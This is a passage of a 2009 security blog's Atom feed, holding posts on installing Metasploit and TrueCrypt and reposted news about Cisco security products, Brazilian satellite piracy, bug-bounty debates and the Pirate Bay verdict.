id="BLOGGER_PHOTO_ID_5335678176653978306" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;One&lt;/span&gt;&lt;br /&gt;* Download latest &lt;a href="http://tortoisesvn.net/downloads"&gt;tortoisesvn&lt;/a&gt;&lt;br /&gt;* Create a directory with any name (ex: metasploit)&lt;br /&gt;* Checkout latest metasploit version by using &lt;a href="http://metasploit.com/svn/framework3/trunk/"&gt;http://metasploit.com/svn/framework3/trunk/&lt;/a&gt;&lt;br /&gt;* Download ruby packaged by One-Click Ruby Installer Project.&lt;br /&gt;* &lt;a href="http://rubyforge.org/frs/?group_id=167"&gt;ruby185-22.exe&lt;/a&gt; is recommended for this example.&lt;br /&gt;* Install it in any directory&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Two&lt;/span&gt;&lt;br /&gt;* Download Ruby/GTK2 binaries for Windows.&lt;br /&gt;* &lt;a href="http://prdownloads.sourceforge.net/ruby-gnome2/ruby-gnome2-0.16.0-1-i386-mswin32.exe?download"&gt;ruby-gnome2-0.16.0-1-i386-mswin32.exe&lt;/a&gt; is recommended for this example.&lt;br /&gt;* Execute it. Basically, you don't need to change any settings. There are three points you can set it by yourself.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;          GTK2 Runtime: If you have your own GTK2 binaries(and the bin-path is added to PATH), you may check off this option. But it is heavily recommended to check on this option.&lt;/li&gt;&lt;li&gt;Register Environment Variables: The GTK2 Runtime bin-path is added to PATH. If you want to use tools such as msginit, msgmerge, etc ..., this option is useful. But if you don't need them, you shouldn't check this option. Especially, if you have some other GTK2 applications, it may causes any DLL conflicts.&lt;/li&gt;&lt;li&gt;Choose the install directory: Note that you need to choose the ruby-install-dir (Ex: c:\Ruby).&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-weight: bold;"&gt;Three&lt;/span&gt;&lt;br /&gt;* Time to test it.&lt;br /&gt;* The following commands should be typed on the "Prompt for DOS". To open the Prompt for DOS on:&lt;br /&gt;    &lt;enter&gt;&lt;enter&gt;&lt;br /&gt;C:\&gt;ruby -v&lt;br /&gt;ruby 1.8.0 (2003-05-26) [i386-mswin32]&lt;br /&gt;&lt;br /&gt;C:\&gt;ruby -e "require 'gtk2'"&lt;br /&gt;&lt;br /&gt;C:\&gt;ruby -rgtk2 -e "Gtk::Window.new.show;Gtk.main"&lt;br /&gt;&lt;br /&gt;* If it didn't return any error, it's done.&lt;br /&gt;&lt;/enter&gt;&lt;/enter&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-5584908831753882846?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/5584908831753882846/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=5584908831753882846' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5584908831753882846'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5584908831753882846'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/05/svn-metasploit-on-windows.html' title='svn metasploit on windows'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_zPPJaS3LoQM/SgwjCDNDqsI/AAAAAAAAAn4/yUUhvXkc5KY/s72-c/metasploit-hax_small.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-781781791587797243</id><published>2009-04-27T15:34:00.007+08:00</published><updated>2009-04-27T16:09:20.067+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Truecrypt Installation on Fedora 10</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SfVmNb_lT0I/AAAAAAAAAnw/64x1GiU6z6E/s1600-h/Fedora10_012_Plymouth_Boot.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 150px;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SfVmNb_lT0I/AAAAAAAAAnw/64x1GiU6z6E/s200/Fedora10_012_Plymouth_Boot.png" alt="" id="BLOGGER_PHOTO_ID_5329278115101626178" border="0" /&gt;&lt;/a&gt;TrueCrypt 6.1 on Fedora 10 was quite straightforward. Here is a quick list of steps to follow:&lt;br /&gt;&lt;br /&gt;﻿1. Download the TrueCrypt 6.1 source tarball from www.truecrypt.org&lt;br /&gt;&lt;br /&gt;2. Untar the source:&lt;br /&gt;&lt;span style="font-style: italic;"&gt;[root@slash-the Download]# tar -zxvf TrueCrypt\ 6.1a\ Source.tar.gz&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;3. Install required libraries:&lt;br /&gt;&lt;span style="font-style: italic;"&gt;[root@slash-the Download]# &lt;/span&gt;&lt;span style="font-style: italic;"&gt;yum install nss-pkcs11-devel fuse-devel wxGTK wxGTK-devel gnome-keyring-devel gcc-c++&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. Export the Cryptoki include folder:&lt;br /&gt;&lt;span style="font-style: italic;"&gt;[root@slash-the Download]# &lt;/span&gt;&lt;span style="font-style: italic;"&gt;export PKCS11_INC=/usr/include/gp11&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;5. Run make&lt;br /&gt;You may get the following error messages:&lt;br /&gt;&lt;span style="font-style: italic;"&gt;../Common/SecurityToken.cpp:654: error: ‘CKR_NEW_PIN_MODE’ was not declared in this scope&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;../Common/SecurityToken.cpp:655: error: ‘CKR_NEXT_OTP’ was not declared in this scope&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;5.1 Open Common/SecurityToken.cpp in your favourite editor.&lt;br /&gt;&lt;br /&gt;5.2 Scroll to line 654&lt;br /&gt;&lt;br /&gt;5.3 Comment out line 654 and 655. It should look like this:&lt;br /&gt;&lt;span style="font-style: italic;"&gt;// TC_CASE_STR (CKR_NEW_PIN_MODE);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt; // TC_CASE_STR (CKR_NEXT_OTP);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;5.4 Save and exit&lt;br /&gt;&lt;br /&gt;5.5 Run make again&lt;br /&gt;&lt;br /&gt;6. TrueCrypt is now compiled:&lt;br /&gt;&lt;span style="font-style: italic;"&gt;[root@slash-the Download]# &lt;/span&gt;cp Main/truecrypt /usr/share/bin&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-781781791587797243?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/781781791587797243/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=781781791587797243' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/781781791587797243'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/781781791587797243'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/04/truecrypt-installation-on-fedora-10.html' title='Truecrypt Installation on Fedora 10'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_zPPJaS3LoQM/SfVmNb_lT0I/AAAAAAAAAnw/64x1GiU6z6E/s72-c/Fedora10_012_Plymouth_Boot.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-4662799759399955483</id><published>2009-04-22T14:31:00.003+08:00</published><updated>2009-04-22T14:45:41.497+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Cisco puts more security in the cloud</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/Se68-Znxs2I/AAAAAAAAAno/sXyqiZjWEvA/s1600-h/Cisco_11.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 134px;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/Se68-Znxs2I/AAAAAAAAAno/sXyqiZjWEvA/s200/Cisco_11.jpg" alt="" id="BLOGGER_PHOTO_ID_5327403189441508194" border="0" /&gt;&lt;/a&gt;SAN FRANCISCO--Cisco is set to make several cloud-related security announcements at the RSA conference on Tuesday, including the expansion of its hosted security services and the integration of security-as-a-service applications with corporate network infrastructures.&lt;div class="postBody"&gt;&lt;p&gt; The new products include Cisco Security Cloud Services, Cisco IPS Sensor Software 7.0 for intrusion prevention, and Cisco Adaptive Security Appliance 5500 Series 8.2 software with a botnet traffic filter for identifying infected clients and remote access capabilities.&lt;/p&gt;&lt;p&gt; The company uses what it calls "SensorBase," a massive threat-monitoring network overseen by 500 workers in its Cisco Security Intelligence Operations center. The center collects data from 7,000 devices and hundreds of millions of client computers, providing snapshots of activity at different times and locations that can indicate if a large attack is going on, said Ambika Gadre, director of product marketing in the security technology business unit at Cisco, during a briefing on Monday.&lt;/p&gt;&lt;p&gt; The company also is announcing Cisco SAFE, a security reference architecture organizations can use as a guideline for deploying security solutions, and Cisco Information Technology Governance, Risk Management and Compliance consulting services.&lt;/p&gt;&lt;p&gt; In addition, Cisco is introducing the Cisco WebEx Collaboration Cloud for software-as-a-service, a network to provide high performance and security for conferencing, instant messaging and other enterprise work group activities. Also new is the Cisco WebEx Node for ASR 1000 Series, which allows the edge &lt;a href="http://reviews.cnet.com/networking-wifi/" section="luke_topic"&gt;router&lt;/a&gt; to act as a point of presence in a corporate network for online meetings.&lt;/p&gt;&lt;p&gt;As confusing as it may be to keep the separate announcements straight, one analyst said Cisco's overall security strategy is a good one. &lt;/p&gt;&lt;p&gt; "There's been a rejuvenation of security at Cisco. They've had a hard time dealing with big picture things," said Peter Christy, principal of the Internet Research Group. "Their long-term vision is that security migrates with you" through the cloud.&lt;/p&gt;&lt;p&gt; Patrick Peterson, a security researcher at Cisco, described some of the threats facing corporations, including cybercriminals based in Russia and the Ukraine.&lt;/p&gt;&lt;p&gt;  "They are the Bill Gates of cybercrime," because they are tech savvy and have an innovative entrepreneurial sense, he said.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;SOURCE: &lt;a href="http://news.cnet.com/8301-1009_3-10223738-83.html"&gt;www.cnet.com&lt;/a&gt;&lt;br /&gt;&lt;/p&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-4662799759399955483?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/4662799759399955483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=4662799759399955483' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4662799759399955483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4662799759399955483'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/04/cisco-puts-more-security-in-cloud.html' title='Cisco puts more security in the cloud'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_zPPJaS3LoQM/Se68-Znxs2I/AAAAAAAAAno/sXyqiZjWEvA/s72-c/Cisco_11.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-1270059310632573449</id><published>2009-04-21T11:55:00.002+08:00</published><updated>2009-04-21T12:02:07.123+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>The Great Brazilian Satellite-Hack Crackdown</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/Se1D26lYmAI/AAAAAAAAAng/LRIKeiRiQpU/s1600-h/fleet-satelite.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 132px;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/Se1D26lYmAI/AAAAAAAAAng/LRIKeiRiQpU/s200/fleet-satelite.jpg" alt="" id="BLOGGER_PHOTO_ID_5326988544967219202" border="0" /&gt;&lt;/a&gt;CAMPINAS, Brazil — On the night of March 8, cruising 22,000 miles above the Earth, U.S. Navy communications satellite FLTSAT-8 suddenly erupted with illicit activity. Jubilant voices and anthems crowded the channel on a junkyard's worth of homemade gear from across vast and silent stretches of the Amazon: Ronaldo, a Brazilian soccer idol, had just scored his first goal with the Corinthians.&lt;br /&gt;&lt;br /&gt;It was a party that won't soon be forgotten. Ten days later, Brazilian Federal Police swooped in on 39 suspects in six states in the largest crackdown to date on a growing problem here: illegal hijacking of U.S. military satellite transponders.&lt;br /&gt;&lt;br /&gt;"This had been happening for more than five years," says Celso Campos, of the Brazilian Federal Police. "Since the communication channel was open, not encrypted, lots of people used it to talk to each other."&lt;br /&gt;&lt;br /&gt;The practice is so entrenched, and the knowledge and tools so widely available, few believe the campaign to stamp it out will be quick or easy.&lt;br /&gt;&lt;br /&gt;Much of this country's geography is remote, and beyond the reach of cellphone coverage, making American satellites an ideal, if illegal, communications option. The problem goes back more than a decade, to the mid-1990s, when Brazilian radio technicians discovered they could jump on the UHF frequencies dedicated to satellites in the Navy's Fleet Satellite Communication system, or FLTSATCOM. They've been at it ever since.&lt;br /&gt;&lt;br /&gt;Truck drivers love the birds because they provide better range and sound than ham radios. Rogue loggers in the Amazon use the satellites to transmit coded warnings when authorities threaten to close in. Drug dealers and organized criminal factions use them to coordinate operations.&lt;br /&gt;&lt;br /&gt;Today, the satellites, which pirates called "Bolinha" or "little ball," are a national phenomenon.&lt;br /&gt;&lt;br /&gt;"It's impossible not to find equipment like this when we catch an organized crime gang," says a police officer involved in last month's action.&lt;br /&gt;&lt;br /&gt;The crackdown, called "Operation Satellite," was Brazil's first large-scale enforcement against the problem. Police followed coordinates provided by the U.S. Department of Defense and confirmed by Anatel, Brazil's FCC. Among those charged were university professors, electricians, truckers and farmers, the police say. The suspects face up to four years and jail, but are more likely to be fined if convicted.&lt;br /&gt;&lt;br /&gt;SOURCE: &lt;a href="http://www.wired.com/politics/security/news/2009/04/fleetcom"&gt;http://www.wired.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-1270059310632573449?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/1270059310632573449/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=1270059310632573449' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/1270059310632573449'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/1270059310632573449'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/04/great-brazilian-satellite-hack.html' title='The Great Brazilian Satellite-Hack Crackdown'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_zPPJaS3LoQM/Se1D26lYmAI/AAAAAAAAAng/LRIKeiRiQpU/s72-c/fleet-satelite.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-5664191197409236653</id><published>2009-04-20T09:58:00.002+08:00</published><updated>2009-04-20T10:01:52.365+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Should We Reward Hackers for Finding Flaws?</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SevXgdNC-4I/AAAAAAAAAnY/i9WXHnmgAQ0/s1600-h/pcworld.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 90px; height: 86px;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SevXgdNC-4I/AAAAAAAAAnY/i9WXHnmgAQ0/s200/pcworld.gif" alt="" id="BLOGGER_PHOTO_ID_5326587936890878850" border="0" /&gt;&lt;/a&gt;Dr. Charlie Miller, &lt;a href="http://www.infoworld.com/t/platforms/researcher-cracks-mac-in-10-seconds-078" target="_blank"&gt;famous Mac hacker&lt;/a&gt;, announced at this year's &lt;a href="http://cansecwest.com/" target="_blank"&gt;CanSecWest hacking contest&lt;/a&gt; that he would no longer be releasing exploits for free, to the vendor or anyone else. Further, Charlie and a few friends have started a &lt;a href="http://blog.trailofbits.com/2009/03/22/no-more-free-bugs" target="_blank"&gt;"No More Free Bugs" campaign&lt;/a&gt;, which even &lt;a href="http://nomorefreebugs.org/logo.jpg" target="_blank"&gt;has its own logo&lt;/a&gt;.&lt;div class="articleBodyContent"&gt;&lt;p&gt;&lt;/p&gt;   &lt;p&gt;I've met and very much respect &lt;a href="http://www.pcworld.com/businesscenter/article/162019/safari_hacker_talks_security.html?tk=rel_news" target="_blank"&gt;Charlie Miller,&lt;/a&gt; and I believe his intentions are good. He just wants to make a living doing what he is good at. The services he provides are valuable, to the software vendor and to us all. Still, I'm bothered by one nagging question: Will or won't Charlie sell his bug findings to parties with malicious intentions? He hasn't yet made a clear, definitive statement on that. I suspect he won't, but for now, I don't know for sure.&lt;/p&gt;   &lt;p&gt;(It took Charlie Miller only &lt;a href="http://www.pcworld.com/businesscenter/article/161536/researcher_cracks_mac_in_10_seconds.html?tk=rel_news" target="_blank"&gt;10 seconds to crack the Mac &lt;/a&gt;at CanSecWest. Now he says he's found a way to &lt;a href="http://www.infoworld.com/d/security-central/famed-hacker-finds-possible-bug-in-apples-iphone-761?source=fssr" target="_blank"&gt;trick the iPhone into enabling shell code.)&lt;/a&gt;&lt;/p&gt;   &lt;p&gt;I feel for Charlie and other truly elite, well-intentioned hackers like him. I've met many of them over the last 20 years, and I know that discovering vulnerabilities isn't the easiest way to make a living. I've known talented hackers who provided independently found exploits to the vendor and were offended when the vendor didn't want to pay them for their hard work. I've seen these initially well-intentioned hackers begin multiyear vendettas against the vendor, who they purportedly wanted to work for, by announcing bug after bug in retaliation. I've seen scorned hackers sell bugs to competitors and beat up the vendor in the press.&lt;/p&gt;   &lt;p&gt;&lt;strong&gt;Penny in a haystack&lt;/strong&gt;&lt;/p&gt;   &lt;p&gt;Selling exploits is a money-making opportunity like never before, especially if you're a black hat. A hacker that doesn't care who gets his exploit can sell a decent vulnerability finding for a widely distributed software program for $5,000 or more. Prices on the black market are hard to find, but I've seen offers for up to $100,000 for a remote buffer overflow exploit against Windows Server 2003. Considering that multiple &lt;a href="http://www.infoworld.com/d/security-central/organized-crime-behind-big-spike-in-corporate-data-breaches-601" target="_blank"&gt;crimeware syndicates&lt;/a&gt; are making tens of millions of dollars, or more, a price of tens of thousands of dollars for a well-coded exploit is pretty cheap in the grand scheme of things.&lt;/p&gt;   &lt;p&gt;Even in the white hat world, many legitimate parties are paying for bugs and exploits. First, many vendors (including my full-time employer, Microsoft) pay millions to internal and external bug finders, although they are almost always (if not always) contracted before the bugs are found. CanSecWest and other hacking contests pay for new zero-day vulnerabilities. Several other organizations, like the &lt;a href="http://www.zerodayinitiative.com/" target="_blank"&gt;Zero Day Initiative&lt;/a&gt;, pay for new vulnerability findings. They make their money on the back end by selling protection products to their clients. Lastly, it's a poorly kept secret that our government has huge teams of people working on finding exploits for offense and defense purposes. There have even been &lt;a href="http://blog.wslabi.com/" target="_blank"&gt;attempts at open-air vulnerability auctions&lt;/a&gt;.&lt;/p&gt;   &lt;p&gt;&lt;strong&gt;Black and white&lt;br /&gt;&lt;/strong&gt;&lt;/p&gt;   &lt;p&gt;The sad fact is that a found exploit doesn't earn the white hat hacker nearly as much money as the same exploit would bring in the black hat market. That's because white hat hacking is about fixing the product and protecting people, while black hat hacking is about separating people from their money. A friend of mine at a large software company did an analysis of the company's spending for internal and externally hired vulnerability finders, and he said the money paid often worked out to less than $25 per found bug. It's hard for any legitimate hacker to make a decent living at those wages.&lt;/p&gt;   &lt;p&gt;But they do. I guess that's it in a nutshell. There are lots of ways to make money in this world. My computer books would sell a lot more if they contained porn, or I could supplement my income with tax-free money by selling illegal drugs, but I've got to be able to look at myself in the mirror in the morning and be proud of what I'm doing. I get paid to hack, but I've never done it without permission or with ill will toward anyone. Whatever personality trait takes to be involved with something malicious, it's missing from my DNA.&lt;/p&gt;   &lt;p&gt;Many companies make a decent if not robust living finding bugs for vendors. Maybe they aren't making $5,000 or more per bug, but they've built successful -- sometimes highly successful -- businesses doing it the right way. They've become industry names and created individual stars. Their owners have grown the company, created long-term careers for their employees, and are able to hold their heads up high without a moment of second-guessing.&lt;/p&gt;   &lt;p&gt;For every infamous black hat hacker, I can name two infamous white hat hackers and their companies -- names such as @Stake, ZDI, &lt;a href="http://labs.idefense.com/" target="_blank"&gt;iDefense&lt;/a&gt;, &lt;a href="http://www.davidlitchfield.com/" target="_blank"&gt;David Litchfield&lt;/a&gt;, &lt;a href="http://www.foundstone.com/" target="_blank"&gt;Foundstone&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Dave_Aitel" target="_blank"&gt;Dave Aitel&lt;/a&gt;, &lt;a href="http://www.immunitysec.com/" target="_blank"&gt;Immunity&lt;/a&gt;, and so many more.&lt;/p&gt;   &lt;p&gt;Charlie and other "No More Free Bugs" advocates deserve to make a living doing what they do best. But I hope they consider the types of people and companies they will be selling their bugs to. We need them to assure us that they are on our side every time.&lt;/p&gt;&lt;/div&gt;       &lt;div id="copyright"&gt;For more IT analysis and commentary on emerging technologies, visit &lt;a href="http://www.infoworld.com/"&gt;InfoWorld.com&lt;/a&gt;. Story copyright © 2007 InfoWorld Media Group. All rights reserved.&lt;br /&gt;&lt;br /&gt;source: &lt;a href="http://www.pcworld.com/businesscenter/article/163333/should_we_reward_hackers_for_finding_flaws.html"&gt;PCWORLD&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-5664191197409236653?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/5664191197409236653/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=5664191197409236653' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5664191197409236653'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5664191197409236653'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/04/should-we-reward-hackers-for-finding.html' title='Should We Reward Hackers for Finding Flaws?'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_zPPJaS3LoQM/SevXgdNC-4I/AAAAAAAAAnY/i9WXHnmgAQ0/s72-c/pcworld.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-359753388092474623</id><published>2009-04-20T09:54:00.001+08:00</published><updated>2009-04-20T09:56:54.481+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Pirate Bay Team Sentenced to Jail</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/SevWR9oTu2I/AAAAAAAAAnQ/PB4ePybjywg/s1600-h/piratebay.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 82px; height: 87px;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/SevWR9oTu2I/AAAAAAAAAnQ/PB4ePybjywg/s200/piratebay.gif" alt="" id="BLOGGER_PHOTO_ID_5326586588385491810" border="0" /&gt;&lt;/a&gt;A Swedish court has found the four men behind file-sharing site The Pirate Bay guilty of infringing copyright law, sentencing them to a year each in jail and ordering them to pay £3 million ($4.5 million) in damages to 17 entertainment companies including Warner Bros (TWI), Sony Music Entertainment (SNE), EMI and Columbia Pictures. The media companies had been seeking $17.5 million.&lt;br /&gt;&lt;br /&gt;Despite the verdict, The Pirate Bay remains open for business — that is, the non-commercial business of pointing users to content, but not hosting it, which its lawyers contend is legal. Though entertainment companies are cheering the victory, it doesn’t seem like it will have any direct effect on the more than 20 million people who use The Pirate Bay.&lt;br /&gt;&lt;br /&gt;The folks behind The Pirate Bay — founders Gottfrid Svartholm Warg and Fredrik Neij, spokesman and programmer Peter Lunde, and funder Carl Lundström — were hardly stony-faced about being convicted, and said they would appeal and don’t plan to pay the fine. Here’s an archive video of this morning’s exceedingly casual press conference, and The Pirate Bay’s Peter Sunde as quoted by the BBC:&lt;br /&gt;&lt;br /&gt;  “It’s so bizarre that we were convicted at all and it’s even more bizarre that we were [convicted] as a team. The court said we were organised. I can’t get Gottfrid out of bed in the morning. If you’re going to convict us, convict us of disorganised crime.&lt;br /&gt;&lt;br /&gt;  “We can’t pay and we wouldn’t pay. Even if I had the money I would rather burn everything I owned, and I wouldn’t even give them the ashes.”&lt;br /&gt;&lt;br /&gt;For background on the proceedings, see our pieces The Definitive Primer to the Pirate Bay Trial and So What’s Really Going on With That Pirate Bay Trial?.&lt;br /&gt;&lt;br /&gt;source: &lt;a href="http://money.cnn.com/news/newsfeeds/gigaom/media/2009_04_17_pirate_bay_team_sentenced_to_jail.html#"&gt;CNN&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-359753388092474623?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/359753388092474623/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=359753388092474623' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/359753388092474623'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/359753388092474623'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/04/pirate-bay-team-sentenced-to-jail.html' title='Pirate Bay Team Sentenced to Jail'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_zPPJaS3LoQM/SevWR9oTu2I/AAAAAAAAAnQ/PB4ePybjywg/s72-c/piratebay.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-1928087479101437349</id><published>2009-03-25T22:37:00.001+08:00</published><updated>2009-03-25T22:39:50.238+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Researchers unveil persistent BIOS attack methods</title><content type='html'>&lt;a 